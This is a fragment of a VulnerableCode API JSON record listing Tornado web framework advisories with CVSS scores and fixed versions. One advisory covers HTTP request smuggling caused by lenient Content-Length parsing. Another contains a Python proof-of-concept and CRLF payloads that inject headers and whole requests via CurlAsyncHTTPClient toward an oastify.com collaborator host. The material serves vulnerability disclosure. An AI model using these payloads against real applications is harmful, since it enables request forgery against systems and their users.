], "url": "https://github.com/tornadoweb/tornado/commit/24a2d96ea115f663b223887deb0060f13974c104" }, { "reference_url": "https://github.com/tornadoweb/tornado/releases/tag/v6.5.5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/releases/tag/v6.5.5" }, { "reference_url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-78cv-mqj4-43f7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-78cv-mqj4-43f7" }, { "reference_url": "https://github.com/advisories/GHSA-78cv-mqj4-43f7", "reference_id": "GHSA-78cv-mqj4-43f7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-78cv-mqj4-43f7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/66661?format=api", "purl": "pkg:pypi/tornado@6.5.5", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.5.5" } ], "aliases": [ "GHSA-78cv-mqj4-43f7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jbwv-ayru-8fgm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/18705?format=api", "vulnerability_id": "VCID-jf6j-dngc-6qdp", "summary": "Tornado vulnerable to HTTP request smuggling via improper parsing of `Content-Length` fields and chunk lengths\n## Summary\nTornado interprets `-`, `+`, and `_` in chunk length and `Content-Length` values, which are not allowed by the HTTP RFCs. This can result in request smuggling when Tornado is deployed behind certain proxies that interpret those non-standard characters differently. This is known to apply to older versions of haproxy, although the current release is not affected.\n\n## Details\nTornado uses the `int` constructor to parse the values of `Content-Length` headers and chunk lengths in the following locations:\n### `tornado/http1connection.py:445`\n```python3\n self._expected_content_remaining = int(headers[\"Content-Length\"])\n```\n### `tornado/http1connection.py:621`\n```python3\n content_length = int(headers[\"Content-Length\"]) # type: Optional[int]\n```\n### `tornado/http1connection.py:671`\n```python3\n chunk_len = int(chunk_len_str.strip(), 16)\n```\nBecause `int(\"0_0\") == int(\"+0\") == int(\"-0\") == int(\"0\")`, using the `int` constructor to parse and validate strings that should contain only ASCII digits is not a good strategy.", "references": [ { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/b7a5dd29bb02950303ae96055082c12a1ea0a4fe", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/commit/b7a5dd29bb02950303ae96055082c12a1ea0a4fe" }, { "reference_url": "https://github.com/advisories/GHSA-qppv-j76h-2rpx", "reference_id": "GHSA-qppv-j76h-2rpx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qppv-j76h-2rpx" }, { "reference_url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-qppv-j76h-2rpx", "reference_id": "GHSA-qppv-j76h-2rpx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-qppv-j76h-2rpx" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/59469?format=api", "purl": "pkg:pypi/tornado@6.3.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-e25f-6gkj-vfgw" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" }, { "vulnerability": "VCID-y14s-8wpj-wygd" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.3.3" } ], "aliases": [ "GHSA-qppv-j76h-2rpx", "GMS-2023-1908" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jf6j-dngc-6qdp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/18238?format=api", "vulnerability_id": "VCID-y14s-8wpj-wygd", "summary": "Tornado has a CRLF injection in CurlAsyncHTTPClient headers\n### Summary\nTornado’s `curl_httpclient.CurlAsyncHTTPClient` class is vulnerable to CRLF (carriage return/line feed) injection in the request headers.\n\n### Details\nWhen an HTTP request is sent using `CurlAsyncHTTPClient`, Tornado does not reject carriage return (\\r) or line feed (\\n) characters in the request headers. As a result, if an application includes an attacker-controlled header value in a request sent using `CurlAsyncHTTPClient`, the attacker can inject arbitrary headers into the request or cause the application to send arbitrary requests to the specified server.\n\nThis behavior differs from that of the standard `AsyncHTTPClient` class, which does reject CRLF characters.\n\nThis issue appears to stem from libcurl's (as well as pycurl's) lack of validation for the [`HTTPHEADER`](https://curl.se/libcurl/c/CURLOPT_HTTPHEADER.html) option. libcurl’s documentation states:\n\n> The headers included in the linked list must not be CRLF-terminated, because libcurl adds CRLF after each header item itself. Failure to comply with this might result in strange behavior. libcurl passes on the verbatim strings you give it, without any filter or other safe guards. That includes white space and control characters.\n\npycurl similarly appears to assume that the headers adhere to the correct format. Therefore, without any validation on Tornado’s part, header names and values are included verbatim in the request sent by `CurlAsyncHTTPClient`, including any control characters that have special meaning in HTTP semantics.\n\n### PoC\nThe issue can be reproduced using the following script:\n\n```python\nimport asyncio\n\nfrom tornado import httpclient\nfrom tornado import curl_httpclient\n\nasync def main():\n http_client = curl_httpclient.CurlAsyncHTTPClient()\n\n request = httpclient.HTTPRequest(\n # Burp Collaborator payload\n \"http://727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com/\",\n method=\"POST\",\n body=\"body\",\n # Injected header using CRLF characters\n headers={\"Foo\": \"Bar\\r\\nHeader: Injected\"}\n )\n\n response = await http_client.fetch(request)\n print(response.body)\n\n http_client.close()\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n```\n\nWhen the specified server receives the request, it contains the injected header (`Header: Injected`) on its own line:\n\n```http\nPOST / HTTP/1.1\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com\nUser-Agent: Mozilla/5.0 (compatible; pycurl)\nAccept: */*\nAccept-Encoding: gzip,deflate\nFoo: Bar\nHeader: Injected\nContent-Length: 4\nContent-Type: application/x-www-form-urlencoded\n\nbody\n```\n\nThe attacker can also construct entirely new requests using a payload with multiple CRLF sequences. For example, specifying a header value of `\\r\\n\\r\\nPOST /attacker-controlled-url HTTP/1.1\\r\\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com` results in the server receiving an additional, attacker-controlled request:\n\n```http\nPOST /attacker-controlled-url HTTP/1.1\nHost: 727ymeu841qydmnwlol261ktkkqbe24qt.oastify.com\nContent-Length: 4\nContent-Type: application/x-www-form-urlencoded\n\nbody\n```\n\n### Impact\nApplications using the Tornado library to send HTTP requests with untrusted header data are affected. This issue may facilitate the exploitation of server-side request forgery (SSRF) vulnerabilities.", "references": [ { "reference_url": "https://github.com/tornadoweb/tornado", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado" }, { "reference_url": "https://github.com/tornadoweb/tornado/commit/7786f09f84c9f3f2012c4cf3878417cb9f053669", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/commit/7786f09f84c9f3f2012c4cf3878417cb9f053669" }, { "reference_url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-w235-7p84-xx57", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/tornadoweb/tornado/security/advisories/GHSA-w235-7p84-xx57" }, { "reference_url": "https://github.com/advisories/GHSA-w235-7p84-xx57", "reference_id": "GHSA-w235-7p84-xx57", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-w235-7p84-xx57" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/58666?format=api", "purl": "pkg:pypi/tornado@6.4.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-3y8v-vsd8-ubba" }, { "vulnerability": "VCID-62bx-a5uf-j3b4" }, { "vulnerability": "VCID-be89-uuxa-fyb5" }, { "vulnerability": "VCID-jbwv-ayru-8fgm" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@6.4.1" } ], "aliases": [ "GHSA-w235-7p84-xx57" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y14s-8wpj-wygd" } ], "fixing_vulnerabilities": [], "risk_score": "4.0", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/tornado@2.1.1" }